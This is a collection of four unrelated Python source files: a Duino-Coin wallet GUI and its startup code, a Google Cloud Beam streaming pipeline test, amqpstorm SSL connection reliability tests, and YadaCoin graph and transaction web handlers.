sticky=W + S,
padx=(5, 0))
recipient = Entry(
master,
border="0",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
recipient.grid(row=5,
column=1,
sticky=N + W + S + E,
columnspan=3,
padx=(0, 5))
recipient.insert("0", "revox")
recipient.bind("<FocusIn>", clear_recipient_placeholder)
Label(
master,
text=get_string("amount"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=6,
column=0,
sticky=W + S,
padx=(5, 0))
amount = Entry(
master,
border="0",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
amount.grid(row=6,
column=1,
sticky=N + W + S + E,
columnspan=3,
padx=(0, 5))
amount.insert("0", str(VERSION))
amount.bind("<FocusIn>", clear_amount_placeholder)
sendLabel = Button(
master,
text=get_string("send_funds"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
sendLabel.grid(
row=8,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5),
pady=(1, 2))
sendLabel.bind("<Button-1>", send_funds_protocol)
wrapLabel = Button(
master,
text=get_string("wrap_duco"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
wrapLabel.grid(
row=9,
column=0,
sticky=N + S + E + W,
columnspan=2,
padx=(5, 1),
pady=(1, 5))
wrapLabel.bind("<Button-1>", wrapper_window)
wrapLabel = Button(
master,
text=get_string("unwrap_duco"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
wrapLabel.grid(
row=9,
column=2,
sticky=N + S + E + W,
columnspan=2,
padx=(1, 5),
pady=(1, 5))
wrapLabel.bind("<Button-1>", unwrapper_window)
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=10,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5, 5))
Label(
master,
text=get_string("estimated_profit"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=11,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
sessionprofittext = StringVar()
sessionprofittext.set(get_string("please_wait_calculating"))
sessionProfitLabel = Label(
master,
textvariable=sessionprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
sessionProfitLabel.grid(
row=12,
column=0,
sticky=W,
columnspan=4,
padx=5)
minuteprofittext = StringVar()
minuteProfitLabel = Label(
master,
textvariable=minuteprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
minuteProfitLabel.grid(
row=13,
column=0,
sticky=W,
columnspan=4,
padx=5)
hourlyprofittext = StringVar()
hourlyProfitLabel = Label(
master,
textvariable=hourlyprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
hourlyProfitLabel.grid(
row=14,
column=0,
sticky=W,
columnspan=4,
padx=5)
dailyprofittext = StringVar()
dailyprofittext.set("")
dailyProfitLabel = Label(
master,
textvariable=dailyprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
dailyProfitLabel.grid(
row=15,
column=0,
sticky=W,
columnspan=4,
padx=5)
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=16,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=5)
Label(
master,
text=get_string("local_transactions"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=17,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
transactionstext = StringVar()
transactionstext.set("")
transactionstextLabel = Label(
master,
textvariable=transactionstext,
font=TEXT_FONT,
justify=LEFT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
transactionstextLabel.grid(
row=18,
column=0,
sticky=W,
columnspan=4,
padx=5,
pady=(0, 5))
separator = ttk.Separator(master,
orient="horizontal")
separator.grid(
row=19,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=5,
pady=(0, 10))
original = Image.open(resources + "transactions.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
transactions = ImageTk.PhotoImage(resized)
transactions.image = transactions
transactionsLabel = Label(
master,
image=transactions,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
transactionsLabel.grid(
row=20,
column=0,
sticky=N + S + W + E,
pady=(0, 5))
transactionsLabel.bind("<Button>", transactions_window)
original = Image.open(resources + "calculator.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
calculator = ImageTk.PhotoImage(resized)
calculator.image = calculator
calculatorLabel = Label(
master,
image=calculator,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
calculatorLabel.grid(
row=20,
column=1,
sticky=N + S + W + E,
padx=(0, 5),
pady=(0, 5))
calculatorLabel.bind("<Button>", currency_converter_window)
original = Image.open(resources + "stats.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
stats = ImageTk.PhotoImage(resized)
stats.image = stats
statsLabel = Label(
master,
image=stats,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
statsLabel.grid(
row=20,
column=2,
sticky=N + S + W + E,
padx=(0, 5),
pady=(0, 5))
statsLabel.bind("<Button>", statistics_window)
original = Image.open(resources + "settings.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
settings = ImageTk.PhotoImage(resized)
settings.image = settings
settingsLabel = Label(
master,
image=settings,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
settingsLabel.grid(
row=20,
column=3,
sticky=N + S + W + E,
padx=(0, 10),
pady=(0, 5))
settingsLabel.bind("<Button>", settings_window)
root.iconphoto(True, PhotoImage(file=resources + "duco_color.png"))
start_balance = global_balance
curr_bal = start_balance
profit_calculator(start_balance)
update_balance_labels()
root.mainloop()
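# Optional runtime dependencies: missing packages are installed on the fly
# where possible, otherwise the related feature is disabled or the app exits.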
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed."
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"pypresence\".")
install("pypresence")
try:
from PIL import Image, ImageTk
except ModuleNotFoundError:
print("Pillow is not installed. "
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"Pillow\".")
install("Pillow")
try:
from notifypy import Notify
except ModuleNotFoundError:
print("Notify-py is not installed. "
+ "Continuing without notification system.")
notificationsEnabled = False
else:
notificationsEnabled = True
try:
from cryptography.fernet import Fernet, InvalidToken
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
backend = default_backend()
except ModuleNotFoundError:
print("Cryptography is not installed. "
+ "Please manually install \"cryptography\"."
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
import secrets
except ModuleNotFoundError:
print("Secrets is not installed. "
+ "Please manually install \"secrets\"."
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
from base64 import urlsafe_b64decode as b64d
from base64 import urlsafe_b64encode as b64e
except ModuleNotFoundError:
print("Base64 is not installed. "
+ "Please manually install \"base64\""
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
import tronpy
from tronpy.keys import PrivateKey
TRONPY_ENABLED = True
except ModuleNotFoundError:
TRONPY_ENABLED = False
print("Tronpy is not installed. "
+ "Please manually install \"tronpy\" "
+ "if you intend on using wDUCO wrapper.")
else:
tron = tronpy.Tron()
wduco = tron.get_contract("TWYaXdxA12JywrUdou3PFD1fvx2PWjqK9U")
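# Fetch the current pool address and port from the project's serverip.txt.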
with urlopen(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/gh-pages/"
+ "serverip.txt") as content:
content = content.read().decode().splitlines()
pool_address = content[0]
pool_port = content[1]
if not path.exists(resources):
mkdir(resources)
with sqlconn(resources + "/wallet.db") as con:
cur = con.cursor()
cur.execute(
"""CREATE TABLE IF NOT EXISTS
Transactions(Date TEXT, amount REAL)""")
cur.execute(
"""CREATE TABLE IF NOT EXISTS
UserData(username TEXT, password TEXT, useWrapper TEXT)""")
con.commit()
if not Path(resources + "duco.png").is_file():
urlretrieve("https://i.imgur.com/9JzxR0B.png", resources + "duco.png")
if not Path(resources + "duco_color.png").is_file():
urlretrieve(
"https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/master/"
+ "Resources/duco.png?raw=true",
resources + "duco_color.png")
if not Path(resources + "calculator.png").is_file():
urlretrieve("https://i.imgur.com/iqE28Ej.png",
resources + "calculator.png")
if not Path(resources + "exchange.png").is_file():
urlretrieve("https://i.imgur.com/0qMtoZ7.png",
resources + "exchange.png")
if not Path(resources + "discord.png").is_file():
urlretrieve("https://i.imgur.com/LoctALa.png",
resources + "discord.png")
if not Path(resources + "github.png").is_file():
urlretrieve("https://i.imgur.com/PHEfWbl.png",
resources + "github.png")
if not Path(resources + "settings.png").is_file():
urlretrieve("https://i.imgur.com/NNEI4WL.png",
resources + "settings.png")
if not Path(resources + "transactions.png").is_file():
urlretrieve("https://i.imgur.com/nbVPlKk.png",
resources + "transactions.png")
if not Path(resources + "stats.png").is_file():
urlretrieve("https://i.imgur.com/KRfHZUM.png",
resources + "stats.png")
if not Path(resources + "langs.json").is_file():
urlretrieve(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "Wallet_langs.json",
resources + "langs.json")
# Load language strings depending on system locale
with open(resources + "langs.json", "r", encoding="utf-8") as lang_file:
lang_file = jsonloads(lang_file.read())
try:
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("bg"):
lang = "bulgarian"
elif locale.startswith("nl"):
lang = "dutch"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
except IndexError:
lang = "english"
if __name__ == "__main__":
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("SELECT COUNT(username) FROM UserData")
userdata_count = cur.fetchall()[0][0]
if userdata_count < 1:
root = Tk()
lf = LoginFrame(root)
root.mainloop()
cur = con.cursor()
cur.execute("SELECT COUNT(username) FROM UserData")
userdata_count = cur.fetchall()[0][0]
if userdata_count >= 1:
loading_window()
cur = con.cursor()
cur.execute("SELECT * FROM UserData")
userdata_query = cur.fetchone()
username = userdata_query[0]
passwordEnc = (userdata_query[1]).decode("utf-8")
password = b64decode(passwordEnc).decode("utf8")
status.config(text=get_string("preparing_wallet_window"))
loading.update()
try:
# Start duco price updater
get_duco_price()
get_balance()
init_rich_presence()
Thread(target=update_rich_presence).start()
try:
# Destroy loading dialog and start the main wallet window
loading.destroy()
except Exception:
pass
root = Tk()
my_gui = Wallet(root)
except Exception as e:
print(e)
_exit(0)
|
streaming_beam_test.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import os
import subprocess as sp
import tempfile
import time
import uuid
from google.cloud import bigquery
from google.cloud import pubsub
import pytest
PROJECT = os.environ["GCLOUD_PROJECT"]
UUID = str(uuid.uuid4()).split('-')[0]
DATASET = 'beam_samples_{}'.format(UUID)
TABLE = 'streaming_beam_sql'
TOPIC = 'messages-{}'.format(UUID)
SUBSCRIPTION = TOPIC
@pytest.fixture
def topic_path():
publisher_client = pubsub.PublisherClient()
topic_path = publisher_client.topic_path(PROJECT, TOPIC)
try:
publisher_client.delete_topic(topic_path)
except Exception:
pass
topic = publisher_client.create_topic(topic_path)
yield topic.name
publisher_client.delete_topic(topic_path)
@pytest.fixture
def subscription_path(topic_path):
subscriber = pubsub.SubscriberClient()
subscription_path = subscriber.subscription_path(PROJECT, SUBSCRIPTION)
try:
subscriber.delete_subscription(subscription_path)
except Exception:
pass
subscription = subscriber.create_subscription(subscription_path, topic_path)
yield subscription.name
subscriber.delete_subscription(subscription_path)
@pytest.fixture
def dataset():
bigquery_client = bigquery.Client(project=PROJECT)
dataset_id = '{}.{}'.format(PROJECT, DATASET)
dataset = bigquery.Dataset(dataset_id)
dataset = bigquery_client.create_dataset(dataset, exists_ok=True)
yield '{}:{}'.format(PROJECT, DATASET)
bigquery_client.delete_table('{}.{}'.format(DATASET, TABLE), not_found_ok=True)
bigquery_client.delete_dataset(DATASET, not_found_ok=True)
def _infinite_publish_job(topic_path):
publisher_client = pubsub.PublisherClient()
while True:
future = publisher_client.publish(
topic_path,
b'{"url": "https://beam.apache.org/", "review": "positive"}')
future.result()
time.sleep(1)
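# End-to-end check: one process keeps publishing Pub/Sub messages while another
# runs streaming_beam.py on the DirectRunner; the results are then read back
# from BigQuery.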
def test_dataflow_flex_templates_pubsub_to_bigquery(dataset, topic_path,
subscription_path):
# Use one process to publish messages to a topic.
publish_process = mp.Process(target=lambda: _infinite_publish_job(topic_path))
# Use another process to run the streaming pipeline that should write one
# row to BigQuery every minute (according to the default window size).
pipeline_process = mp.Process(target=lambda: sp.call([
'python', 'streaming_beam.py',
'--project', PROJECT,
'--runner', 'DirectRunner',
'--temp_location', tempfile.mkdtemp(),
'--input_subscription', subscription_path,
'--output_table', '{}.{}'.format(dataset, TABLE),
'--window_interval', '5',
]))
publish_process.start()
pipeline_process.start()
pipeline_process.join(timeout=30)
publish_process.join(timeout=0)
pipeline_process.terminate()
publish_process.terminate()
# Check for output data in BigQuery.
bigquery_client = bigquery.Client(project=PROJECT)
query = 'SELECT * FROM {}.{}'.format(DATASET, TABLE)
query_job = bigquery_client.query(query)
rows = query_job.result()
assert rows.total_rows > 0
for row in rows:
assert row['score'] == 1
# TODO: The test case using TestStream currently does not work as intended:
# the first write to BigQuery fails. A bug has been filed; this test case
# will be updated once the bug is fixed.
'''
@mock.patch("apache_beam.Pipeline", TestPipeline)
@mock.patch(
"apache_beam.io.ReadFromPubSub",
lambda subscription: (
TestStream()
.advance_watermark_to(0)
.advance_processing_time(60)
.add_elements([TimestampedValue(
b'{"url": "https://beam.apache.org/", "review": "positive"}',
1575937195)])
.advance_processing_time(60)
.add_elements([TimestampedValue(
b'{"url": "https://beam.apache.org/", "review": "positive"}',
1575937255)])
.advance_watermark_to_infinity()
),
)
def test_dataflow_flex_templates_pubsub_to_bigquery(dataset):
streaming_beam.run(
args=[
"--project", PROJECT,
"--runner", "DirectRunner"
],
input_subscription="unused",
output_table='{}:{}.{}'.format(PROJECT, DATASET, TABLE),
)
# Check for output data in BigQuery.
bigquery_client = bigquery.Client(project=PROJECT)
query = 'SELECT * FROM {}.{}'.format(DATASET, TABLE)
query_job = bigquery_client.query(query)
rows = query_job.result()
assert rows.total_rows > 0
'''
|
reliability_tests.py
|
import ssl
import threading
import time
from amqpstorm import Connection
from amqpstorm import UriConnection
from amqpstorm.tests import CAFILE
from amqpstorm.tests import PASSWORD
from amqpstorm.tests import SSL_HOST
from amqpstorm.tests import SSL_URI
from amqpstorm.tests import USERNAME
from amqpstorm.tests.functional.utility import TestFunctionalFramework
from amqpstorm.tests.functional.utility import setup
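# Functional SSL tests: repeatedly open and close connections/channels against
# a live RabbitMQ broker and verify that sockets and pollers are cleaned up.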
class SSLReliabilityFunctionalTests(TestFunctionalFramework):
@setup(new_connection=False, queue=True)
def test_functional_ssl_open_new_connection_loop(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
for _ in range(5):
            self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, port=5671, ssl=True,
ssl_options=ssl_options, timeout=1)
self.channel = self.connection.channel()
# Make sure that it's a new channel.
self.assertEqual(int(self.channel), 1)
self.channel.queue.declare(self.queue_name)
# Verify that the Connection/Channel has been opened properly.
self.assertIsNotNone(self.connection._io.socket)
self.assertIsNotNone(self.connection._io.poller)
self.assertTrue(self.connection.is_open)
self.channel.close()
self.connection.close()
# Verify that the Connection has been closed properly.
self.assertTrue(self.connection.is_closed)
self.assertIsNone(self.connection._io.socket)
self.assertIsNone(self.connection._io.poller)
self.assertFalse(self.connection._io._running.is_set())
self.assertFalse(self.connection.exceptions)
@setup(new_connection=False, queue=True)
def test_functional_ssl_open_close_connection_loop(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
        self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, port=5671, ssl=True,
ssl_options=ssl_options, timeout=1, lazy=True)
for _ in range(5):
self.connection.open()
channel = self.connection.channel()
# Make sure that it's a new channel.
self.assertEqual(int(channel), 1)
channel.queue.declare(self.queue_name)
channel.close()
# Verify that the Connection/Channel has been opened properly.
self.assertIsNotNone(self.connection._io.socket)
self.assertIsNotNone(self.connection._io.poller)
self.assertTrue(self.connection.is_open)
self.connection.close()
# Verify that the Connection has been closed properly.
self.assertTrue(self.connection.is_closed)
self.assertIsNone(self.connection._io.socket)
self.assertIsNone(self.connection._io.poller)
self.assertFalse(self.connection._io._running.is_set())
self.assertFalse(self.connection.exceptions)
@setup(new_connection=False, queue=False)
def test_functional_ssl_open_close_channel_loop(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
        self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, port=5671, ssl=True,
ssl_options=ssl_options)
for _ in range(25):
channel = self.connection.channel()
# Verify that the Channel has been opened properly.
self.assertTrue(self.connection.is_open)
self.assertTrue(channel.is_open)
# Channel id should be staying at 1.
self.assertEqual(int(channel), 1)
channel.close()
            # Verify that the Channel has been closed properly.
self.assertTrue(self.connection.is_open)
self.assertTrue(channel.is_closed)
@setup(new_connection=False, queue=True)
def test_functional_ssl_open_multiple_channels(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
        self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, port=5671, ssl=True,
ssl_options=ssl_options, lazy=True)
for _ in range(5):
channels = []
self.connection.open()
for index in range(3):
channel = self.connection.channel()
channels.append(channel)
# Verify that the Channel has been opened properly.
self.assertTrue(channel.is_open)
self.assertEqual(int(channel), len(channels))
self.connection.close()
@setup(new_connection=False, queue=False)
def test_functional_ssl_close_performance(self):
"""Make sure closing a connection never takes longer than ~1 seconds.
:return:
"""
for _ in range(10):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
            self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, timeout=60, port=5671, ssl=True,
ssl_options=ssl_options)
start_time = time.time()
self.connection.close()
self.assertLess(time.time() - start_time, 3)
@setup(new_connection=False)
def test_functional_ssl_uri_connection(self):
self.connection = UriConnection(SSL_URI)
self.channel = self.connection.channel()
self.assertTrue(self.connection.is_open)
@setup(new_connection=False)
def test_functional_ssl_uri_connection_with_context(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
self.connection = UriConnection(SSL_URI, ssl_options=ssl_options)
self.channel = self.connection.channel()
self.assertTrue(self.connection.is_open)
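# Throughput tests: publish 1000 messages over SSL and consume them from
# several threads, or in a single pass until the queue is empty.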
class PublishAndConsume1kWithSSLTest(TestFunctionalFramework):
messages_to_send = 1000
messages_consumed = 0
lock = threading.Lock()
def configure(self):
self.disable_logging_validation()
def publish_messages(self):
for _ in range(self.messages_to_send):
self.channel.basic.publish(body=self.message,
routing_key=self.queue_name)
def consume_messages(self):
channel = self.connection.channel()
channel.basic.consume(queue=self.queue_name,
no_ack=False)
for message in channel.build_inbound_messages(
break_on_empty=False):
self.increment_message_count()
message.ack()
if self.messages_consumed == self.messages_to_send:
break
def increment_message_count(self):
with self.lock:
self.messages_consumed += 1
@setup(new_connection=False, queue=False)
def test_functional_publish_1k_with_ssl(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
        self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, port=5671, ssl=True,
ssl_options=ssl_options)
self.channel = self.connection.channel()
self.channel.queue.declare(self.queue_name)
publish_thread = threading.Thread(target=self.publish_messages, )
publish_thread.daemon = True
publish_thread.start()
for _ in range(4):
consumer_thread = threading.Thread(target=self.consume_messages, )
consumer_thread.daemon = True
consumer_thread.start()
start_time = time.time()
while self.messages_consumed != self.messages_to_send:
if time.time() - start_time >= 60:
break
time.sleep(0.1)
for channel in list(self.connection.channels.values()):
channel.stop_consuming()
channel.close()
self.assertEqual(self.messages_consumed, self.messages_to_send,
'test took too long')
class Consume1kWithSSLUntilEmpty(TestFunctionalFramework):
messages_to_send = 1000
def configure(self):
self.disable_logging_validation()
def publish_messages(self):
for _ in range(self.messages_to_send):
self.channel.basic.publish(body=self.message,
routing_key=self.queue_name)
@setup(new_connection=False, queue=True)
def test_functional_consume_with_ssl_until_empty(self):
ssl_options = {
'context': ssl.create_default_context(cafile=CAFILE),
'server_hostname': SSL_HOST
}
        self.connection = Connection(
SSL_HOST, USERNAME, PASSWORD, port=5671, ssl=True,
ssl_options=ssl_options)
self.channel = self.connection.channel()
self.channel.queue.declare(self.queue_name)
self.channel.confirm_deliveries()
self.publish_messages()
channel = self.connection.channel()
channel.basic.consume(queue=self.queue_name,
no_ack=False)
message_count = 0
for message in channel.build_inbound_messages(break_on_empty=True):
message_count += 1
message.ack()
result = channel.queue.declare(self.queue_name, passive=True)
self.assertEqual(result['message_count'], 0)
self.assertEqual(message_count, self.messages_to_send,
'not all messages consumed')
channel.close()
|
graphhandlers.py
|
"""
Handlers required by the graph operations
"""
import base64
import hashlib
import json
import os
import time
import requests
from bitcoin.wallet import P2PKHBitcoinAddress
from coincurve.utils import verify_signature
from eccsnacks.curve25519 import scalarmult_base
from logging import getLogger
from threading import Thread
from yadacoin.basehandlers import BaseHandler
from yadacoin.blockchainutils import BU
from yadacoin.fastgraph import FastGraph
from yadacoin.graph import Graph
from yadacoin.graphutils import GraphUtils as GU
from yadacoin.transaction import TransactionFactory, Transaction, InvalidTransactionException, \
InvalidTransactionSignatureException, MissingInputTransactionException
from yadacoin.transactionutils import TU
from yadacoin.transactionbroadcaster import TxnBroadcaster
from yadacoin.peers import Peer
class GraphConfigHandler(BaseHandler):
async def get(self):
if int(self.config.web_server_port) == 443:
peer = "https://{}:{}".format(self.config.web_server_host, self.config.web_server_port)
else:
peer = "http://{}:{}".format(self.config.web_server_host, self.config.web_server_port)
yada_config = {
"baseUrl": "{}".format(peer),
"transactionUrl": "{}/transaction".format(peer),
"fastgraphUrl": "{}/post-fastgraph-transaction".format(peer),
"graphUrl": "{}".format(peer),
"walletUrl": "{}/get-graph-wallet".format(peer),
"loginUrl": "{}/login".format(peer),
"registerUrl": "{}/create-relationship".format(peer),
"authenticatedUrl": "{}/authenticated".format(peer),
"logoData": ''
}
return self.render_as_json(yada_config)
class BaseGraphHandler(BaseHandler):
def get_base_graph(self):
self.bulletin_secret = self.get_query_argument('bulletin_secret').replace(' ', '+')
if self.request.body:
ids = json.loads(self.request.body.decode('utf-8')).get('ids')
else:
ids = []
try:
key_or_wif = self.get_secure_cookie('key_or_wif').decode()
except:
key_or_wif = None
return Graph(self.config, self.config.mongo, self.bulletin_secret, ids, key_or_wif)
# TODO: should have a self.render here instead, not sure what is supposed to be returned here
class GraphInfoHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
self.render_as_json(graph.to_dict())
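# Wallet endpoint: splits the unspent outputs for an address into on-chain and
# fastgraph transactions (matched by relationship id) and reports both balances.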
class GraphRIDWalletHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
config = self.config
address = self.get_query_argument('address')
bulletin_secret = self.get_query_argument('bulletin_secret').replace(' ', "+")
amount_needed = self.get_query_argument('amount_needed', None)
if amount_needed:
amount_needed = int(amount_needed)
rid = TU.generate_rid(config, bulletin_secret)
unspent_transactions = [x for x in BU().get_wallet_unspent_transactions(address)]
spent_txn_ids = []
for x in unspent_transactions:
spent_txn_ids.extend([y['id'] for y in x['inputs']])
unspent_fastgraph_transactions = [x for x in BU().get_wallet_unspent_fastgraph_transactions(address) if x['id'] not in spent_txn_ids]
spent_fastgraph_ids = []
for x in unspent_fastgraph_transactions:
spent_fastgraph_ids.extend([y['id'] for y in x['inputs']])
regular_txns = []
txns_for_fastgraph = []
chain_balance = 0
fastgraph_balance = 0
for txn in unspent_transactions + unspent_fastgraph_transactions:
if 'signatures' in txn and txn['signatures']:
fastgraph = FastGraph.from_dict(0, txn)
origin_fasttrack = fastgraph.get_origin_relationship(rid)
if origin_fasttrack or (('rid' in txn and txn['rid'] == rid) or txn.get('requester_rid') == rid or txn.get('requested_rid') == rid):
txns_for_fastgraph.append(txn)
for output in txn['outputs']:
if output['to'] == address:
fastgraph_balance += int(output['value'])
else:
regular_txns.append(txn)
for output in txn['outputs']:
if output['to'] == address:
chain_balance += int(output['value'])
elif 'dh_public_key' in txn and txn['dh_public_key'] and (('rid' in txn and txn['rid'] == rid) or txn.get('requester_rid') == rid or txn.get('requested_rid') == rid):
txns_for_fastgraph.append(txn)
for output in txn['outputs']:
if output['to'] == address:
fastgraph_balance += int(output['value'])
else:
regular_txns.append(txn)
for output in txn['outputs']:
if output['to'] == address:
chain_balance += int(output['value'])
wallet = {
'chain_balance': chain_balance,
'fastgraph_balance': fastgraph_balance,
'balance': fastgraph_balance + chain_balance,
'unspent_transactions': regular_txns,
'txns_for_fastgraph': txns_for_fastgraph
}
self.render_as_json(wallet, indent=4)
class RegistrationHandler(BaseHandler):
async def get(self):
data = {
'bulletin_secret': self.config.bulletin_secret,
'username': self.config.username,
'callbackurl': self.config.callbackurl,
'to': self.config.address
}
self.render_as_json(data)
class GraphTransactionHandler(BaseGraphHandler):
async def get(self):
        rid = self.get_query_argument('rid', None)
if rid:
transactions = BU().get_transactions_by_rid(rid, self.config.bulletin_secret, rid=True, raw=True)
else:
transactions = []
self.render_as_json(list(transactions))
async def post(self):
self.get_base_graph() # TODO: did this to set bulletin_secret, refactor this
items = json.loads(self.request.body.decode('utf-8'))
if not isinstance(items, list):
items = [items, ]
else:
items = [item for item in items]
transactions = []
for txn in items:
transaction = Transaction.from_dict(BU().get_latest_block()['index'], txn)
try:
transaction.verify()
except InvalidTransactionException:
await self.config.mongo.async_db.failed_transactions.insert_one({
'exception': 'InvalidTransactionException',
'txn': txn
})
print('InvalidTransactionException')
return 'InvalidTransactionException', 400
except InvalidTransactionSignatureException:
print('InvalidTransactionSignatureException')
await self.config.mongo.async_db.failed_transactions.insert_one({
'exception': 'InvalidTransactionSignatureException',
'txn': txn
})
return 'InvalidTransactionSignatureException', 400
except MissingInputTransactionException:
pass
except:
raise
                print('unknown error')
                return 'unknown error', 400
transactions.append(transaction)
for x in transactions:
await self.config.mongo.async_db.miner_transactions.insert_one(x.to_dict())
try:
self.config.push_service.do_push(x.to_dict(), self.bulletin_secret, self.app_log)
except Exception as e:
print(e)
print('do_push failed')
txn_b = TxnBroadcaster(self.config)
await txn_b.txn_broadcast_job(transaction)
return self.render_as_json(items)
class CreateRelationshipHandler(BaseHandler):
async def post(self):
config = self.config
mongo = self.config.mongo
kwargs = json.loads(self.request.body.decode('utf-8'))
bulletin_secret = kwargs.get('bulletin_secret', '')
username = kwargs.get('username', '')
to = kwargs.get('to', '')
if not bulletin_secret:
return 'error: "bulletin_secret" missing', 400
if not username:
return 'error: "username" missing', 400
if not to:
return 'error: "to" missing', 400
rid = TU.generate_rid(config, bulletin_secret)
dup = mongo.db.blocks.find({'transactions.rid': rid})
if dup.count():
found_a = False
found_b = False
for txn in dup:
if txn['public_key'] == config.public_key:
found_a = True
if txn['public_key'] != config.public_key:
found_b = True
if found_a and found_b:
return json.dumps({"success": False, "status": "Already added"})
miner_transactions = mongo.db.miner_transactions.find()
mtxn_ids = []
for mtxn in miner_transactions:
for mtxninput in mtxn['inputs']:
mtxn_ids.append(mtxninput['id'])
checked_out_txn_ids = mongo.db.checked_out_txn_ids.find()
for mtxn in checked_out_txn_ids:
mtxn_ids.append(mtxn['id'])
a = os.urandom(32).decode('latin1')
dh_public_key = scalarmult_base(a).encode('latin1').hex()
dh_private_key = a.encode('latin1').hex()
transaction = TransactionFactory(
block_height=BU().get_latest_block()['index'],
bulletin_secret=bulletin_secret,
username=username,
fee=0.00,
public_key=config.public_key,
dh_public_key=dh_public_key,
private_key=config.private_key,
dh_private_key=dh_private_key,
outputs=[
{
'to': to,
'value': 0
}
]
)
mongo.db.miner_transactions.insert(transaction.transaction.to_dict())
"""
# TODO: integrate new socket/peer framework for transmitting txns
job = Process(target=TxnBroadcaster.txn_broadcast_job, args=(transaction.transaction,))
job.start()
"""
self.render_as_json({"success": True})
class GraphSentFriendRequestsHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
graph.get_sent_friend_requests()
self.render_as_json(graph.to_dict())
class GraphFriendRequestsHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
graph.get_friend_requests()
self.render_as_json(graph.to_dict())
class GraphFriendsHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
self.render_as_json(graph.to_dict())
class GraphPostsHandler(BaseGraphHandler):
async def get(self):
graph = self.get_base_graph()
graph.get_posts()
